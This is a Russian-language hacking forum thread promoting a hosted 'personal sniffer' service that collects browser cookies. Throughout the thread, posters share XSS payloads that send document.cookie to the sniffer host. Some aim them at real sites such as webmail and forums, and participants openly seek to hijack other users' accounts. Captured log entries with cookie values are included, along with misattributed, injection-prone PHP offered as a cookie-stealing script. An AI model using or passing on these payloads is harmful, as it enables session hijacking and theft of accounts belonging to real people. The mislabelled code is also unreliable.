На античате не работает, да и вообще в рунете не видел персональных - решил восстановить старый. На этот раз все будет тип-топ, т.к уже на своем серваке все :)

Как узнать адрес моего персонального сниффера?
Адрес вашего снифера – http://s.netsec.ru/Ваш_Логин.gif (Обратие внимание на регистр!)

Как им воспользоваться?
Простой вызов по ссылке:

<a href="http://s.netsec.ru/mda.gif?test">click me</a>

Вызов как картинки:

<img src="http://s.netsec.ru/mda.gif">

Вызов из скрипта:

<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>


Обратите внимание на знак ? после mda.gif.

На сниффере есть ограничение – 5000 записей. Поэтому регулярно следите за забитостью аккуанта, иначе вы можете не получить новых записей.

Как применить? Читайте карту раздела статьи

Дал ссылку, поставил аватару, поставил как фон , а поле стринг пустое

Адрес – http://s.netsec.ru
Регистрация нового – http://s.netsec.ru/?act=reg

Добавлен фильтр по ИП и хосту.

После того как положили кое что на спамхаус, который грозился внести ИП сервера в блеки, но все равно внес хтя мы выполнили все их условия =) прикрутил домен назад, сниффер опять работает..

Чёт я неврубился как им пользоваться!? Как его запустить? и что надо вписать в Host или Ip?

На античате не работает...
Да работает на античате, чета тя глючит чувак.

Чёт я неврубился как им пользоваться!? Как его запустить? и что надо вписать в Host или Ip?
уверен, что он нужен тебе?

TrON,
на античате он не работает уже чёрт знает сколько, там только log.php работает если я не прав, то ткни меня носом =)

GreenBear,
благодарю за скиффку, теперь сухо и тепло =)

на античате он не работает уже чёрт знает сколько, там только log.php работает если я не прав, то ткни меня носом =)

Тыкаю тебя носом. надо мозгами немнога пошевелить и въехал бы...
Сам снифак
находится на http://OLD.antichat.ru/cgi-bin/s.jpg
а лог на http://old.antichat.ru/sniff/log.php
------------
в странице лог просто указан не тот адрес да и все.
Спокойно юзаю этот сниффер.

Тыкаю тебя носом. надо мозгами немнога пошевелить и въехал бы...
Сам снифак
находится на http://OLD.antichat.ru/cgi-bin/s.jpg
а лог на http://old.antichat.ru/sniff/log.php
------------
в странице лог просто указан не тот адрес да и все.
Спокойно юзаю этот сниффер.
парень, тебе говорят не про этот сниффер, а про "личный" http://antichat.org/sniffer - про него тебе и говорю, что он не пашет.
А тот, что ты мне показал, можно конечно поюзать его, но я не хочу, ибо личный удобнее.
Понятно о чём речь идёт? Сначала сам мозгами пошевели ;)

https://forum.antichat.ru/showpost.php?p=347528&postcount=8 !

ВСЕ благодарности убедительная просьба выражать в репутацию.

!!!

Время прилета кук отстает на 2 часа от системных часов.

просто время эстонское ...

слушай,а куки где?у меня только вот что пришло
------------------
Time: 24.06 -10.58.39
IP: 83.234.212.36
Host:
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.8 (build 01709))
String:
---------------
что это мне может дать?что вообще может дать ай-пи?

слушай,а куки где?у меня только вот что пришлопохоже на то, что кто-то (может ты) просто запустил файл картинки. Или запрос составлен неверно.
У мну все форцает.

Как проверить работает ли снифер если мои куки в найденной xss не улетают, или пустое окно или слова document.cookie ? Использую http://s.netsec.ru

Пацаны, ко мне куки вабще не приходят. Только IP, хост, и информация да и пустое поле String. Написал все как надо и добавил +document.cookie, только чего то их нет. :(

ну у других работает же.
так что...

У меня не пашет :(

Все пашет, надо в правильно виде ссылку давать. Например в ГТЧате может не пахать, т.к. там стоит редирект, соттвественно ты вылазишь неизвестно куда, а потом от этого неизвестно куда уже на сниф, соотв-но и не приходит ничего. Так по крайней мере у нас в чате.
Зато на форуме, внедренный в подпись куки шлет только так ))))

Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
Р.S. мои сообщения читают там где я их шлю))

у меня вопрос...может он и немного глупый... можно тырить куки с предыдущей по хистори странице?

нет, это нарушает политику безопасности браузера

и всё же мог бы кто-нибудь привести пример действительно работающего запроса который выдирает куки? =)

в первом посте есть.

А если юзать <frame>, куки с него не будут приходить?

а можно как нить сделать, чтобы: отослать код со сниффером на мыло, и этот код сам срабатывал (когда открывают сообщение)?

если так можно сделать, скажите как плиз :)

Причина: Заместо этих букв должен быть текст, который объясняет почему этот сайт закрыт.
Но Green Bear лох и его не исправил.
Короче - закрыто.
P.S. Дизайнер - лох (с) Лебедев
P.S.S. Лебедев самовлюбленный дурак (c) Green Bear
P.S.S.S. Я не люблю чаты, поэтому не буду отвечать, Мудак. (c) Лебедев
P.S.S.S.S. Заебал. (с) Green Bear

Всё, идите воровать. (c) Админ


А что с сайтом случилось ?
Будет ли он работать снова ?

кто-то дефейснул чтоли сайт??? там про Green Bear'a написано что-то....

сниффер работает.. и будет работать.
сайт уже наверно год не работает..

народ, скажите плиз, желательно подробнее и с объяснениями - как добавить скрипт в картинку, чтобы потом при загрузке картинки, скрипт автоматически срабатывал и отсылал куки снифферу.

заранее огрромное спасибо, и про плюсик не забуду :)

Ты ПХП знаешь? Если да, то придумай сам. Если нет - пиши в личку или асю.

укажи ссылку к сниферу.
Типо так:
ссылка (ведет к снифферу)
Чел нажимает и куки твои))

все норм снифф работает.
А прелесть в том что лог запаролен и у каждого свой))

http://s.netsec.ru/max_26_rus.gif

3-12 символов (латинские буквы и цифры)
....

этому видео 100 лет завтра.. не работает бага уже давно.

Народ помогите пожалуйста как правильно написать запрос со сниффером netsec.ru чтоб срабатывал при наведении мыши или как нибудь еще, если не фильтруется тег [googlevideo]

А ещё как то можно взломать форум на fastbb? Научите пожалуйста!
Ищи XSS в форуме. Потом юзай свой сниффер.
Например ты нашел XSS в www.site.com/search=И здесь сниффер. То есть:
www.site.com/search=<script>img = new Image(); img.src = "http://s.netsec.ru/LOGIN?"+document.cookie;</script>
У мну все работает.
Расшифровывать в опере или в мозиле при помощи cookie editor

Прости те меня за тупой вопрос!Мне вот на снифер s.netsec.ru пришла вот такая вот хрень объясните по подробней что это

Time: 15.11 -09.28.27
IP: ***********
Host: http://cc.msnscache.com/cache.aspx?q=72332686331307&mkt=uk-UA&lang=uk-UA&w=30882ad3&FORM=CVRE2
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)
String:

__utma=211301639.258014850.1182155382.1194284788.1 194771843.23; __utmz=211301639.1194771843.23.25.utmccn=(organic) |utmcsr=msn|utmctr=Анімаці ї|utmcmd=organic; style=null; ban=3; scook=1193180954; re_ret=0; rating_km_ua=2037; USERID=50533448; crVct=5; s_lastvisit=1193853435156; LyRatings=|

Скажите пожалуиста...а как наити xss в воруме каком-нибудь?

Скажите пожалуиста...а как наити xss в воруме каком-нибудь?
Парень ты не туда забрёл=) вот ссылка на нужную тебе тему http://forum.antichat.ru/thread20140.html

Парень ты не туда забрёл=) вот ссылка на нужную тебе тему http://forum.antichat.ru/thread20140.html
Был там..но не понл куда именно впмсывать скрипт...в сам саит...привиде пример плизз))

Был там..но не понл куда именно впмсывать скрипт...в сам саит...привиде пример плизз))
Впринципе там всё понятно написано
1
Название сайта жертвы/free?p='><script>img=new Image();img.src="Ссылка на твой снифер(Лучьше всего s.netsec.ru зарегься там) ?"+document.cookie;"+document.cookie;</script>
2
Либо Регишься к примеру на народе тобиш яндекс создаёшь ява скрипт можно воспользоваться редакторо Dremweaver 8 там всё понятно расписано

Название сайта жертвы/free?p='><script src=http://Твой ник в народе .narod.ru/js.js></script>

Исходник дан в скрипте

2.Более сложный способ!Залить линк на свой снифер через админку , но для этого собственно нужен доступ=) Я сам в принципе новичок у меня всего один раз получалось как банер заливать

я захотел взломать чела на форуме и отослал ему ссылку на мои сниффер http://s.netsec.ru/plum.gif
он перешел по неи, но ко мне пришло пустое поле стринг=(( в чем непральность запроса?
Заранее спасибо
P.S не посылаите в другие маста...напишите более подробно и понтно новичку...хочу научитс))

в том что не добавил куки. читай там же не просто ссыль дается а ссыль с хищением кук того они тебе и не пришли

в том что не добавил куки. читай там же не просто ссыль дается а ссыль с хищением кук того они тебе и не пришли
Где там читать то? в какой теме? скинь ссылку плизз

поня где читать....но как его подать то если надо писать тэг <script> но в форумах он не пашет...а если к ссылке добоволять +document cookie то он пишет в поле стринг document.cookie

Я нашел Xss...
запрос подал вот так <script>alert(document.cookie)</script>
увидел свою сессию, а как сделать так что бы это отсылалось на мой сниффер и не только моя сессия=))?

АВТОР,
не мог бы ты сделать переадресацию?допустим жертва зашла на снифф, все ок и ее перекинуло, скажем на ya.ru :) так удобнее и как-то скрытнее...а если "куда переадресовывать" еще можно будет настраивать, то тебе просто огромнейшее спасибо!!!!!

iframe такая переадресация называетса

Одни вопросы,но сто пудова даже ни кто не прочитал элементарной понятной даже слону https://forum.antichat.ru/thread20140.html.

как то кидал автору в асю пару едеек по поиску и бану сказал что будет всё как время будет
а время будет не скоро =)

как использовать сниффер на странице, поняла - картинку вставляешь.... так же, как понимаю, на форумах - в сообщение вставлять картинку????
а в чатах? тупо ссылку на сниффер? чел пройдет, выйдет на картинку размером 1на1???? а еще слышала, что можно перехватывать icq-переписку... расскажите, кто занет.

ЗЫ. огромное спасипо за отличный сниффер)))))))

Пара вопросо, извините(

Time: 03.01 -04.21.17 //число.месяц - час.минуты.секунды??
IP: ***
Host: ***
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; C40; MRA 4.10 (build 01952)) //ие определяется как мозилла??
String:
nuid=****//О_о а какого сайта это куки? предыдущего или настоящего??

по статистике народ.ру на сайт заходит порядком больше человек, чем согласно снифферу. может ли посетитель не регистрироваться сниффером, если у него отключены картинки броузером?? могут ли быть еще какие-нибудь причины?

Подскажите плз, чем расшифровать полученные куки? а то весь вечер мучаюсь... весь поиск переюзал, не могу найти негде( как и что(

помогите разобраться,при переходе по ссылке http://dump.ru/search.php?filename='"></script>'"><scRIPt>alert(document.cookie)</sCRIPT> выдаются мои куки, а сылка http://dump.ru/search.php?filename='"></script>'"><scRIPt>img = new Image(); img.src = "http://s.netsec.ru/логин.gif?"+document.cookie;</sCRIPT>, как я понял из вышенаписанного должна (если я по ней перехожу) отправлять мои куки на сниффер, а туда почему-то вообще ничего не приходит, даже айпи! почему так????

поскажите как можно расшифровать cookie ну или хотябы их себе подставить. заранее спасибо, плюсом не обижу

Подскажите плз, чем расшифровать полученные куки? а то весь вечер мучаюсь... весь поиск переюзал, не могу найти негде( как и что(

Их не надо расшифровивать их надо вставлять в куки к себе!

Их не надо расшифровивать их надо вставлять в куки к себе!

Это уже хорошо, подскажите нам ламерам как :confused:

Если я не ошибаюсь это можно сделать так

register.php
<?
// Страница регситрации нового пользователя

# Соединямся с БД
mysql_connect("localhost", "myhost", "myhost");
mysql_select_db("testtable");


if(isset($_POST['submit']))
{
$err = array();

# проверям логин
if(!preg_match("/^[a-zA-Z0-9]+$/",$_POST['login']))
{
$err[] = "Логин может состоять только из букв английского алфавита и цифр";
}

if(strlen($_POST['login']) < 3 or strlen($_POST['login']) > 30)
{
$err[] = "Логин должен быть не меньше 3-х символов и не больше 30";
}

# проверяем, не сущестует ли пользователя с таким именем
$query = mysql_query("SELECT COUNT(user_id) FROM users WHERE user_login='".mysql_real_escape_string($_POST['login'])."'");
if(mysql_result($query, 0) > 0)
{
$err[] = "Пользователь с таким логином уже существует в базе данных";
}

# Если нет ошибок, то добавляем в БД нового пользователя
if(count($err) == 0)
{

$login = $_POST['login'];

# Убераем лишние пробелы и делаем двойное шифрование
$password = md5(md5(trim($_POST['password'])));

mysql_query("INSERT INTO users SET user_login='".$login."', user_password='".$password."'");
header("Location: login.php"); exit();
}
else
{
print "<b>При регистрации произошли следующие ошибки:</b><br>";
foreach($err AS $error)
{
print $error."<br>";
}
}
}
?>


<form method="POST">
Логин <input name="login" type="text"><br>
Пароль <input name="password" type="password"><br>
<input name="submit" type="submit" value="Зарегистрироваться">
</form>
login.php
<?
// Страница авторизации


# Функция для генерации случайной строки
function generateCode($length=6) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHI JKLMNOPRQSTUVWXYZ0123456789";
$code = "";
$clen = strlen($chars) - 1;
while (strlen($code) < $length) {
$code .= $chars[mt_rand(0,$clen)];
}
return $code;
}


# Соединямся с БД
mysql_connect("localhost", "myhost", "myhost");
mysql_select_db("testtable");

if(isset($_POST['submit']))
{
# Вытаскиваем из БД запись, у которой логин равняеться введенному
$query = mysql_query("SELECT user_id, user_password FROM users WHERE user_login='".mysql_real_escape_string($_POST['login'])."' LIMIT 1");
$data = mysql_fetch_assoc($query);

# Соавниваем пароли
if($data['user_password'] === md5(md5($_POST['password'])))
{
# Генерируем случайное число и шифруем его
$hash = md5(generateCode(10));

if(!@$_POST['not_attach_ip'])
{
# Если пользователя выбрал привязку к IP
# Переводим IP в строку
$insip = ", user_ip=INET_ATON('".$_SERVER['REMOTE_ADDR']."')";
}

# Записываем в БД новый хеш авторизации и IP
mysql_query("UPDATE users SET user_hash='".$hash."' ".$insip." WHERE user_id='".$data['user_id']."'");

# Ставим куки
setcookie("id", $data['user_id'], time()+60*60*24*30);
setcookie("hash", $hash, time()+60*60*24*30);

# Переадресовываем браузер на страницу проверки нашего скрипта
header("Location: check.php"); exit();
}
else
{
print "Вы ввели неправильный логин/пароль";
}
}
?>
<form method="POST">
Логин <input name="login" type="text"><br>
Пароль <input name="password" type="password"><br>
Не прикреплять к IP(не безопасно) <input type="checkbox" name="not_attach_ip"><br>
<input name="submit" type="submit" value="Войти">
</form>
check.php
<?
// Скрипт проверки

# Соединямся с БД
mysql_connect("localhost", "myhost", "myhost");
mysql_select_db("testtable");

if (isset($_COOKIE['id']) and isset($_COOKIE['hash']))
{
$query = mysql_query("SELECT *,INET_NTOA(user_ip) FROM users WHERE user_id = '".intval($_COOKIE['id'])."' LIMIT 1");
$userdata = mysql_fetch_assoc($query);

if(($userdata['user_hash'] !== $_COOKIE['hash']) or ($userdata['user_id'] !== $_COOKIE['id'])
or (($userdata['user_ip'] !== $_SERVER['REMOTE_ADDR']) and ($userdata['user_ip'] !== "0")))
{
setcookie("id", "", time() - 3600*24*30*12, "/");
setcookie("hash", "", time() - 3600*24*30*12, "/");
print "Хм, что-то не получилось";
}
else
{
print "Привет, ".$userdata['user_login'].". Всё работает!";
}
}
else
{
print "Включите куки";
}
?>
Для защиты формы логина от перебора, можно использовать капчу.

в поле вмещается только 65 символов....помогите сделать скрипт ворущий куки

Попробуй этот
if ($_COOKIE["cookie_username"] && $_COOKIE["cookie_password"])
{
dbconnect();
$result = mysql_query("SELECT password FROM users WHERE username='$cookie_username'");
if (mysql_num_rows($result) > 0)
{
$row = mysql_fetch_object($result);
if ($row->password == $cookie_password)
{
$username = $cookie_username;
$password = $cookie_password;

session_register("username");
session_register("password");
}
}
}

Человеки помогайте пишу пить до сниффа http://s.netsec.ru/pop.gif?"+documen.cookie; (мэй би ошипка) кароче куки не идут токо общая информация помогите исправле прально а то блин срочно нада куки спереть.....

Человеки помогайте пишу пить до сниффа http://s.netsec.ru/pop.gif?"+documen.cookie; (мэй би ошипка) кароче куки не идут токо общая информация помогите исправле прально а то блин срочно нада куки спереть.....
ты забыл t
http://s.netsec.ru/pop.gif?"+document.cookie
Прежде чем написать смотрите что рисуете


+ , спасибо
А просто в браузере "Управление куками "и заменить их на подходящие,так что,нельзя?

ладно ща забыл но все равно не идет кука

есть много вариантов почему не идут
http://s.netsec.ru/pop.gif?"+documen.cookie;
они и не должны в так идти.

Snork, значит на сайте на котором ставишь код, по ней заходит неавторизованный пользователь..либо вообще не так ставишь!

Заходят авторизированные пользователи я дажимаю в тексте добавить ссылку и пишу http://s.netsec.ru/pop.gif?"+document.cookie; нажимает админ и ниче не идет просто общая информация а кук нет....

Раньше мне ваще ниче не приходило, а щя проверил все работает... :)

GreenBear спасибо =)

Snork, https://forum.antichat.ru/showpost.php?p=323666&postcount=1

Ха я нубяра напишите просто что писать в ссылке чтобы куки шли))))) умоляю.....

Блин я разобратсо не могу просто напишите тут что печатать чтобы када в ссылку всталяешь чтоб куки приходили и это избавит всех от флуда и меня от бана)))))))))

народ напишите ссылку, которую допустим по мылу кидать надо, что бы все работало

читайте статьи. уязвимости вам никто искать не будет.
в первом линке была ссылка на карту - там более чем достаточно материала собрано.

народ напишите ссылку, которую допустим по мылу кидать надо, что бы все работало

Объясняю на пальцах -куки возможно передать тока если ссылка на сниффер стоит в тегах <script></script> - по другому никак.... А вот как это сделать -уже другой вопрос, потмоу что практически на 98% сайтах и сервисах фильтруются теги <script> <style> <img> и другие .. А тем более на майлру

Небольшое обновление. Теперь можно загрузить свою картинку, заместо гифа 1х1.
http://s.netsec.ru/log.php?opt

машка, а форум будет?)))

Машка наконец-то ты пофиксил навигацию по страницам..
Спасибо

она и так работала в принципе ..

Ребята кто не знает как заставить снифер ловить cookies

читайте

http://forum.antichat.ru/thread46016-XSS.html
http://forum.antichat.ru/thread21437-XSS.html
http://forum.antichat.ru/thread51783-XSS.html
http://forum.antichat.ru/thread35802-XSS.html

Поставил снифф как аву на одном сайте... Отчёты идут, но куков нет.
Сделал - грузить аватару с удалённого сервера.
Есть советы?

Спасибо,снифер отличный.

она и так работала в принципе ..
Не работала, каждый раз в гет запросы дописывался еще гет запрос:
page=30&page=60&page=90
И еще не было выделена курентная страница болдом

Поставил снифф как аву на одном сайте... Отчёты идут, но куков нет.
Сделал - грузить аватару с удалённого сервера.
Есть советы?

Читай выше, я писал уже.

Объясняю на пальцах -куки возможно передать тока если ссылка на сниффер стоит в тегах <script></script> - по другому никак.... А вот как это сделать -уже другой вопрос, потмоу что практически на 98% сайтах и сервисах фильтруются теги <script> <style> <img> и другие .. А тем более на майлру

=(

я вот думаю не очень это корректно.. ведь любой может удалить все логи за 30 минут.
лучше добавить проверку какую-нибудь (по чьей картинке прошли тот и может удалять)

<form action="http://s.netsec.ru/log.php" method="post">
<input type="submit" value="Удалить выделенные" name="delete">
<?php
set_time_limit(0);
for ($i=1; $i<=151413; $i++)
{
echo '<input type="hidden" value="'.$i.'" name="del[]">';
}
?>
</form>

чужие удалить нельзя.
Не работала, каждый раз в гет запросы дописывался еще гет запрос:
page=30&page=60&page=90
но ведь работало ))

Спасибо! Снифер нужный! было бы еще замечательно если бы можно было все логи загрузить одним файлом.

добавил.

Великолепно!!! Еще раз спасибо! Жаль сразу повторно нельзя добавить еще один + . Так что позже попробую, лишь бы не забыть ;)

Никак не удается войти! Все время не верно слово!!!!

все ок.

Вот теперь все ок) Спасибо)) Там все мелкими надо вводить оказывается....
Вставил ссылку на несколько форумов, и мне теперь пустые куки почему то все время приходят...

сайт в дауне?

похоже на то

Очень как не к стати :(

Мда, сервер в дауне(( когда поднимут хоть?)

скоро будет. тех работы.

"Скоро" - понятие растяжимое, сегодня то заработает?

чудеса бывают. верьте.

Наверно, седня уже нет=(((

14.30, все работает как часы)) спс

ну еще с утра работало.

супер!

исправил.

спс, работает!!!

буду рад услышать улучшения, которые вам нужны.

Очень бы хотелось чтобы ещё было без знака "?" .. а то на форумах типа Юкоз знак ? съедает или как там ... в общем хотелось бы как нибудь его убрать :(

никак.

- записи на всю ширину окна как раньше
- окно с кукисами немного больше ужасно недобно скролить когда много кукисов
- возможно "волшебный жезл " как у каника
- сылку на вуис возле айпишника

Здраствуйте)Попробывал взломать почту с помощью снифера и отправки письма,но ничего не получилось....Я отправлял письма с ящика на рамблере на другой ящик рамблера.В письме я делал ссылку следующего содержания:
http://mail.rambler.ru/free?p='><script>img=new Image();img.src="http://s.netsec.ru/мой ник.gif?"+document.cookie;"+document.cookie;</script>
Ничего не вышло....Подскажите,пожалуй� �та, в чем может быть моя ошибка?

http://mail.rambler.ru/free?p= тут нет xss

А на других почтах ,например на mail.ru или yandex.ru,будет таая ссылка работать?А как проверить есть ли на почте xss?А можно как то еще взломать почту на рамблере(кроме брута и тояна)?

другую капчу)) а то бывают буквы которые не разберешь с первого раза, я например оч часто ввожу не то)

Что-то то открывается снифер, то нет... хотя пингуется сервант отлично...

Подскажите,как мне моно почту на рамблере взломать с помощью снифера и похищения куков?Я отправляю в письме следующий код:
<script>img = new Image(); img.src= "http://s.netsec.ru/мой логин.gif?"+document.cookie;</script>
Еще отправляю вот такой вот код,но все равно ничего не получается:
<iframe src=http://s.netsec.ru/мой логин.gif?id=17 frameborder=0 widht=0 height=0></iframe>

Surgeon, http://forum.antichat.ru/showthread.php?t=19610

Очень нужна кнопочка "удалить все записи с пустым String", ибо когда много левых записей - очень тяжело в них копаться.

сделал.

чєто лагаєт снифер невсегда удаетса куки стащить

все там нормально работает...

Ну вот смотри вчера человек 10 точно смотрели мою картинку а логи чистые,тоисть их совсем нет,обясните плз

все пицот раз написано уже.

Ну вот смотри вчера человек 10 точно смотрели мою картинку а логи чистые,тоисть их совсем нет,обясните плз

мож картинки отключены у них.. или кешируется картинка

Штоб картинка кешилась надо чтоб ее хоть раз да просмотрели,потом на себе пробивал раз работает раз нет,я через то и спрашиваю может глюки вчера на серваке какието были

Поставил на одном форуме вместо аватры путь к сниффу,
Отчеты идут но поле string пустое, что значит?

что-то уменя кто токо на картинку незаходил куда токо я ее непихал 0 результата....

парни просто так если кто то зайдет на вашу картинуку вы узнаете только его ip и фсе!!! ничего кроме.... она хороша при испольсовании совместно с какойнибудь xss на форуме или гдето еще...

___________________________________
http://www.hash.ixces.ru/img.gif

не могу найти где подпись делать.... может я ударился головой? напишите если кто знает...

Прочитал статью, нашел xss, в бб имаже. Как заставить работать чтобы куки забирал, я так понял что ссылки на сниффер с мои логином не достаточно, на первой странице, третий вариант со скрипотом, но ведь он не работает на форумах (( помогите пожалуйста, просто уже много времени потратил. Просто напишите, что нужно писать чтобы куки забирались.

снифер в дауне со вчерашнего вечера ,ето только у меня ?

Прочитал статью, нашел xss, в бб имаже. Как заставить работать чтобы куки забирал, я так понял что ссылки на сниффер с мои логином не достаточно, на первой странице, третий вариант со скрипотом, но ведь он не работает на форумах (( помогите пожалуйста, просто уже много времени потратил. Просто напишите, что нужно писать чтобы куки забирались.
Ты плохо прочитал статью(... .
ВО первых у тибя
пассивка или активка
Если активка то хорошо (Сниферы работают:
Допустим мы передаём пароль на снифер
http://snifer.ru/xxx.php?pass='123456'
Далее снифер видит что что то пришло из $_GET и сохраняет это где то в бАЗЕ)

снифер в дауне со вчерашнего вечера ,ето только у меня ?
сиськи лежат. ДЦ чинит

Что-то долго чинят, блин за это время могли куки важные прийти.. эх..

Долго еще ждать? прям позарез нужен

Долго еще ждать? прям позарез нужен
Ни тебе одному...

да че вы мучаетесь, установите себе сниффер и не крутите мозг

да *** знает.... мне тоже мозги трахают.... что в четверг, в субботу, в понедельник починят...

да че вы мучаетесь, установите себе сниффер и не крутите мозг
Да аналог я уже нашел, мне просто логи там посмотреть охото, я уезжал, а приехал он уже не работает.

Почему последние время снифер неработает?

sasha008, 8 = 8 класс? мозг тебе для чего дан? тему смотри

Возобновление работы планируется ?

А че s.netsec.ru не пашет??

А че лень пару страниц назад пролистать?

p.s: с сервером проблеммы... ;)

поскорей бы уже запустили,,,,сколько сниферов не устанавливал,,,куки не записываются никак(((((

блин когда уже запустят(( а есть альтернатива какая нить? у меня был еще один, но тоже не пашет...

Я так полагаю про сниффер можно уже забыть?)

Sniffer - http://na-s.ru

Неужели так сложно переехать на другой хостинг?

парень, тебе говорят не про этот сниффер, а про "личный" http://antichat.org/sniffer - про него тебе и говорю, что он не пашет.
А тот, что ты мне показал, можно конечно поюзать его, но я не хочу, ибо личный удобнее.
Понятно о чём речь идёт? Сначала сам мозгами пошевели ;)



подскажите ,я не могу зарегестрировать свой сниффер на античат...все делаю пишу логин ,пишу пасс а ни чего не выходит да еще что там за картинку надо вставить,благодарю

попробуй на na-s.ru
только там глюки ща

Неужели так сложно переехать на другой хостинг?
нет, но некоторые мудаки отключили вместе с сервером все исходники и базы.

O.mnenie глуки.. глуки.. у кого их нету :) щяс всё норм.
GreenBear забейте.

пользовался на-с.ру, но теперь и этот не работает. кто подскажет еще снифферы?

пользовался на-с.ру, но теперь и этот не работает. кто подскажет еще снифферы?

http://na-s.ru/

sasha008 я же сказал что он сейчас глючит, нужны аналоги

То, что все онлайн снифферы перестали работать это случайность или так задумано?

http://sniffer.xaknet.ru/

народ напишите ссылку, которую допустим по мылу кидать надо, что бы все работало

В первом посте GreenBear, все описал.
Вызов как картинки:
<img src="http://s.netsec.ru/mda.gif">

Вызов из скрипта:
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
а вообще, что за xss у вас? Где она, на почтовике?